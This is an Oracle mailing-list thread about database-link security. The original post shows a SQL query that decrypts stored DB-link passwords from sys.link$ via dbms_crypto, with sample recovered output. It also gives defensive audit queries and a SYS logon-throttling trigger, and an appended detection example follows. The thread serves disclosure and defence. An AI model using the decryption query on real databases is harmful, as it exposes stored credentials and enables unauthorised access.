RE: Database Link Security et al
Date: Wed, 28 Nov 2012 21:29:34 +0100
Message-ID: <4814386347E41145AAE79139EAA398982F74C2D5E9_at_ws03-exch07.iconos.be>
Hi,
Were you able to reproduce this on 11.2.0.3? I checked on two databases and each time the dbms_crypto.decrypt function would give me an error. On 11.2.0.2 it did work, however.
Regards,
Freek D'Hooge
Uptime
Oracle Database Administrator
email: freek.dhooge_at_uptime.be
tel +32(0)3 451 23 82
http://www.uptime.be
disclaimer: www.uptime.be/disclaimer
-----Original Message-----
From: oracle-l-bounce_at_freelists.org [mailto:oracle-l-bounce_at_freelists.org] On Behalf Of oracle_at_ukcert.org.uk
Sent: Sunday 25 November 2012 21:19
To: oracle-l_at_freelists.org
Subject: Database Link Security et al
So, users can decrypt dblink passwords as the key is included in the ciphertext... -->
SQL> select name, userid,
utl_raw.cast_to_varchar2(dbms_crypto.decrypt((substr(passwordx,19)),
4353, (substr(passwordx,3,16)))) from sys.link$ where name='TEST_LINK';
NAME       USERID          PASSWORD
TEST_LINK  DBLINK_ACCOUNT  MYPW
..one saving grace is that we can now identify incoming db links using this..
select userid, terminal, comment$text from sys.aud$ where comment$text like 'DBLINK%';
USERID         NTIMESTAMP#                  USERHOST COMMENT$TEXT
-------------- ---------------------------- -------- ------------------------------------------------
DBLINK_ACCOUNT 19-NOV-12 01.42.16.305194000 orlin    DBLINK_INFO:(SOURCE_GLOBAL_NAME=orcl.4294967295)
-->could be too late though so best to take a few precautions in
advance... preferably automated...
..Same with lack of profiles on SYS account. Sometimes easier to fix ourselves..
create or replace trigger sys_throttler.tra_servererror_ora1017
after servererror on database
declare
  l_db_usr varchar2 (32);
begin
  -- ORA-01017: invalid username/password; logon denied
  if (ora_is_servererror(1017)) then
    l_db_usr := upper (trim (sys_context ('userenv', 'authenticated_identity')));
    if l_db_usr = 'SYS' then
      -- delay each failed SYS logon by one second
      dbms_lock.sleep (1);
    else
      NULL;
    end if;
  end if;
end tra_servererror_ora1017;
/
More like this at UKOUG Monday, if you are in the area...
Cheers,
Paul M. Wright
http://www.oraclesecurity.com
http://2012.ukoug.org/default.asp?p=9339&dlgact=shwprs&prs_prsid=7736&day_dayid=62
-- http://www.freelists.org/webpage/oracle-l
Received on Wed Nov 28 2012 - 21:29:34 CET
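An added example, not part of the original messages: one way to turn the audit query from the original post into a recurring check that reports incoming database-link logons from sources not on an allowlist. It assumes session auditing is enabled so that sys.aud$ carries the DBLINK_INFO comment in the form shown in the post; the schema sec_admin and the table expected_dblink_sources are hypothetical.

```sql
-- Added example, not from the original thread.
-- Assumption: audited logons over a database link carry a comment of the form
--   DBLINK_INFO:(SOURCE_GLOBAL_NAME=...)
-- in sys.aud$.comment$text, as in the output quoted in the post.
-- Hypothetical allowlist of link sources that are expected per account:
--   create table sec_admin.expected_dblink_sources
--     (userid varchar2(30), source_global_name varchar2(256));

with incoming as (
  select a.userid,
         a.userhost,
         a.ntimestamp#,
         -- capture the value between SOURCE_GLOBAL_NAME= and the next ',' or ')'
         trim(regexp_substr(a.comment$text,
                            'SOURCE_GLOBAL_NAME=([^,)]+)',
                            1, 1, null, 1)) as source_global_name
  from   sys.aud$ a
  where  a.comment$text like 'DBLINK%'
)
select i.userid,
       i.source_global_name,
       i.userhost,
       count(*)           as logons,
       min(i.ntimestamp#) as first_seen,
       max(i.ntimestamp#) as last_seen
from   incoming i
where  not exists (
         -- drop account/source pairs that are already known and expected
         select 1
         from   sec_admin.expected_dblink_sources e
         where  e.userid = i.userid
         and    e.source_global_name = i.source_global_name)
group  by i.userid, i.source_global_name, i.userhost
order  by last_seen desc;
```

Rows returned are link sources nobody has signed off on; an empty result means every audited incoming link matched the allowlist.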